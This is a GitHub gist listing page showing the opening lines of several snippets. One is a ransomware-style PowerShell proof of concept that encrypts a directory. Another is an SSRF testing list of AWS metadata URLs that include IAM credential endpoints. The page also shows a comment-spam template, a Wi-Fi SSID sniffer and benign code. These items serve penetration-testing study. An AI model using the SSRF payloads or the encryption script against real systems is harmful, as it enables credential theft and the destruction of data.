Skip to content

Instantly share code, notes, and snippets.

View pmsosa's full-sized avatar
🦈
Always Moving Forward

Pedro M. Sosa pmsosa

🦈
Always Moving Forward
89 followers · 15 following
View GitHub Profile
@2XXE-SRA
2XXE-SRA / coolcryptor.ps1
Last active September 29, 2020 22:36
poc crypto ransomware like script. encrypts all files in given directory
function Invoke-AESEncryptDirectory
{
param(
[string]$directory,
[string]$extension
)
$csharp = @"
//https://stackoverflow.com/questions/27645527/aes-encryption-on-large-files
using System;
@jhaddix
jhaddix / cloud_metadata.txt
Last active August 20, 2024 19:23 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@MaskRay
MaskRay / fft_ntt_bench.cc
Last active May 20, 2017 20:41
FFT & NTT benchmark
#include <algorithm>
#include <cassert>
#include <chrono>
#include <cmath>
#include <complex>
#include <cstdint>
#include <cstdlib>
#include <iostream>
#include <numeric>
#include <string>
@unfo
unfo / how-to-oscp-final.md
Last active August 3, 2024 13:06

How to pass the OSCP

  1. Recon
  2. Find vuln
  3. Exploit
  4. Document it

Recon

Unicornscans in cli, nmap in msfconsole to help store loot in database.

@JustinMcNamara74
JustinMcNamara74 / UserPermissions.sql
Last active May 1, 2024 21:49
#MSSQL List all user permissions/roles for all users
/*
********************************************************************************************************************************
Credits: @Jeremy
Posted: http://stackoverflow.com/questions/7048839/sql-server-query-to-find-all-permissions-access-for-all-users-in-a-database
********************************************************************************************************************************
Security Audit Report
1) List all access provisioned to a sql user or windows user/group directly
2) List all access provisioned to a sql user or windows user/group through a database or application role
3) List all access provisioned to the public role
@shanselman
shanselman / gist:5422230
Last active September 18, 2024 06:47
Evil Blog Comment Spammer just exposed his template through some error and the whole thing showed up in my comments.
{
{I have|I've} been {surfing|browsing} online more than {three|3|2|4} hours today, yet I never found any interesting article like yours. {It's|It
is} pretty worth enough for me. {In my opinion|Personally|In my view}, if all {webmasters|site owners|website owners|web owners} and bloggers made good content as
you did, the {internet|net|web} will be {much more|a lot more}
useful than ever before.|
I {couldn't|could not} {resist|refrain from} commenting. {Very well|Perfectly|Well|Exceptionally well} written!|
{I will|I'll} {right away|immediately} {take hold of|grab|clutch|grasp|seize|snatch}
your {rss|rss feed} as I {can not|can't} {in finding|find|to find} your {email|e-mail} subscription {link|hyperlink} or {newsletter|e-newsletter} service. Do {you have|you've} any?
{Please|Kindly} {allow|permit|let} me {realize|recognize|understand|recognise|know} {so that|in order that} I {may just|may|could} subscribe.
Thanks.|
@securitytube
securitytube / ssid-sniffer-scapy-python.py
Created April 2, 2013 12:49
WLAN SSID Sniffer in Python using Scapy
#!/usr/bin/env python
from scapy.all import *
ap_list = []
def PacketHandler(pkt) :
if pkt.haslayer(Dot11) :
if pkt.type == 0 and pkt.subtype == 8 :
@UniIsland
UniIsland / SimpleHTTPServerWithUpload.py
Created August 14, 2012 04:01
Simple Python Http Server with Upload
#!/usr/bin/env python
"""Simple HTTP Server With Upload.
This module builds on BaseHTTPServer by implementing the standard GET
and HEAD requests in a fairly straightforward manner.
"""
@bellbind
bellbind / ecc.py
Created December 1, 2011 08:08
[python]basics of elliptic curve cryptography
# Basics of Elliptic Curve Cryptography implementation on Python
import collections
def inv(n, q):
"""div on PN modulo a/b mod q as a * inv(b, q) mod q
>>> assert n * inv(n, q) % q == 1
"""
for i in range(q):
if (n * i) % q == 1: